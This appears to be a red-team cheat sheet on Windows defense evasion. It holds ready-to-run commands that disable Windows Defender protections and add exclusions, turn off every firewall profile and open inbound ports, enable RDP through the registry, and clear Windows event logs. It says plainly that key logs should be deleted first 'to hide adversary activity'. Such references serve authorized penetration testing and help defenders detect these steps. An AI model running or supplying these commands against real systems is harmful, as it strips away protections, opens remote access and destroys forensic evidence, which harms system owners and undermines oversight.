Defense evasion

Windows Defender

The following PowerShell command can be used to switch off Windows Defender real-time protection:

# Add the specified folder to Windows Defender's exclusion list.
# The exclusion list can be retrieved using: Get-MpPreference | Ft ExclusionPath
Add-MpPreference -ExclusionPath "<PATH>"

# Disables Windows Defender real-time protection.
Set-MpPreference -DisableRealtimeMonitoring $true

# Disables, in addition to real-time protection, various other protections offered by Microsoft Defender (scanning of scripts and downloaded files, automatic sample submission, etc.).
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Windows Firewall

To check whether the Windows Firewall is enabled on a server or computer, the following command can be used as Administrator / SYSTEM:

# Show the profile applied to each network adapter
netsh advfirewall monitor show currentprofile

# Windows Firewall state for all profile (Public / Domain / Private)
netsh advfirewall show allprofiles

# Show all rules for the given profile
netsh advfirewall firewall show rule profile=<public | private | domain | any | ...> name=all
Get-NetFirewallProfile -Name <Public | Private | Domain | * | ...> | Get-NetFirewallRule

By default, three separate listings are present: Domain profile settings, private profile settings and public profile settings. With the private profile, applied to a network adapter when it is connected to a network that is identified by the user or administrator as a private network, Windows enables network discovery features, allows file sharing and other networked features. The public profile, applied to a network adapter by default or if specified so by an user or administrator, is the most restrictive profile. In the default public profile, Windows will block all inbound connections to programs that are not on the list of allowed programs. Finally, the Domain profile is used when a server or computer is joined to an Active Directory domain. In this environment, firewall settings are typically (but not necessarily) controlled by a network administrator.

Windows blocks inbound connections and allows outbound connections for all profiles by default.

To disable the firewall use the following commands:

# Disable current profile
netsh advfirewall set currentprofile state off

# Disable all profiles
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -All -Enabled False

# Disable the private, public and domain profiles
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set domainprofile state off
Set-NetFirewallProfile -Profile <Domain | Private | Public | PROFILE NAME> -Enabled False

To open a specific port, or a range, use the following command:

netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localport=<PORT> action=allow

Activate RDP

RDP can be enabled / disabled with out the need to restart the system with the reg utility:

# Check if RDP is enabled
netstat /p tcp /a | findstr 3389
# If RDP is enabled, registry value should be equal to 0x0
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Windows logs clearing

Windows event logs track the activity and a number of operations conducted on the system.

The following notable hives, located in %systemroot%\System32\winevt\Logs, may be of interest for forensics analysis (and should thus be deleted in priority to hide adversary activity):

  • Security.evtx: users logon / logoff, local accounts and groups operations, process creation with command line if activated, etc.

  • System.evtx: Windows service creation operations (creation, execution, deletion, etc.)

  • Windows PowerShell.evtx and Microsoft-Windows-PowerShell%4Operational.evtx: PowerShell activity, with a varying level of information depending on the system configuration (activation of non default Module Logging, Script block logging, etc.)

  • Microsoft-Windows-TaskScheduler%4Operational.evtx: scheduled tasks operations (registration, execution, deletion, etc.).

  • Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx, Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational, and Microsoft-WindowsRemoteDesktopServicesRdpCoreTS%4Operational.evtx: RDP activity such as access to the Windows login screen and remote interactive logon through.

  • Microsoft-Windows-WinRM%4Operational

  • Microsoft-Windows-Shell-Core%4Operational.evtx: programs executed through the Run / RunOnce ASEPs registry keys.

  • Microsoft-Windows-AppLocker%4EXE and DLL.evtx and Microsoft-Windows-AppLocker%4MSI and Script (and others Microsoft-Windows-AppLocker%4*.evtx): execution of binaries and scripts if AppLocker is activated in Audit only mode (non default).

Note that upon clearing of some EVTX hives (such as the Security and System hives), specific events will be generated to keep trace of the logs clearing. Refer to the [DFIR] Windows - EVTX integrity note for more information on the Windows events generated by events deletion.

# Clears the specified hive using the wevtutil built-in utility.
wevtutil cl <security | system | HIVE_NAME>

# Clears the specified hive using the Clear-EventLog PowerShell cmdlet.
Clear-EventLog -LogName <Security | System | HIVE_NAME>

# Clears all the logs of the registered ETW provider.
$AllLogs = Get-EventLog -List | ForEach-Object {$_.Log}
$AllLogs | ForEach-Object {Clear-EventLog -LogName $_ }

Last updated